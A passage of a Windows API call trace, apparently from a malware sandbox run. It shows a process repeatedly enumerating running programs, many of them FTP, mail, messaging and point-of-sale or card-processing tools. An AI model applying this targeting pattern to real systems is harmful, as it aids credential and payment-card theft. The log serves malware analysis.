dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0300.681] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0300.685] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0300.687] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0300.689] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0300.691] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0300.698] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0300.700] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0300.702] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0300.705] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0300.707] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0300.708] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0300.710] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0300.712] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0300.714] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0300.719] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0300.721] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0300.724] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0300.726] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0300.728] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0300.730] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0300.732] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0300.734] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0300.736] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0300.741] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0300.743] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0300.745] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0300.747] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0300.749] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0300.750] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0300.752] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0300.754] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0300.755] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0300.757] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0300.759] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0300.761] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0300.762] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0300.764] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0300.766] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0300.767] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0300.769] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0300.770] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0300.772] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0300.774] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0300.775] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0300.855] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0300.858] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0300.860] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0300.863] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0300.865] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0300.866] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0300.868] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0300.870] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0300.871] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0300.873] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0300.875] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0300.877] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0300.879] CloseHandle (hObject=0x21f8) returned 1 [0300.879] Sleep (dwMilliseconds=0x64) [0300.981] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0300.991] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.993] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0300.995] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0300.999] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.001] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0301.002] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.004] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0301.005] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0301.007] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0301.008] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.010] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.016] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0301.019] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.029] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.030] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.032] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.034] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.035] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.037] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.038] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0301.040] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0301.044] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0301.046] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.048] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0301.050] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0301.051] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0301.053] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0301.054] Process32Next (in: hSnapshot=0x21f8, 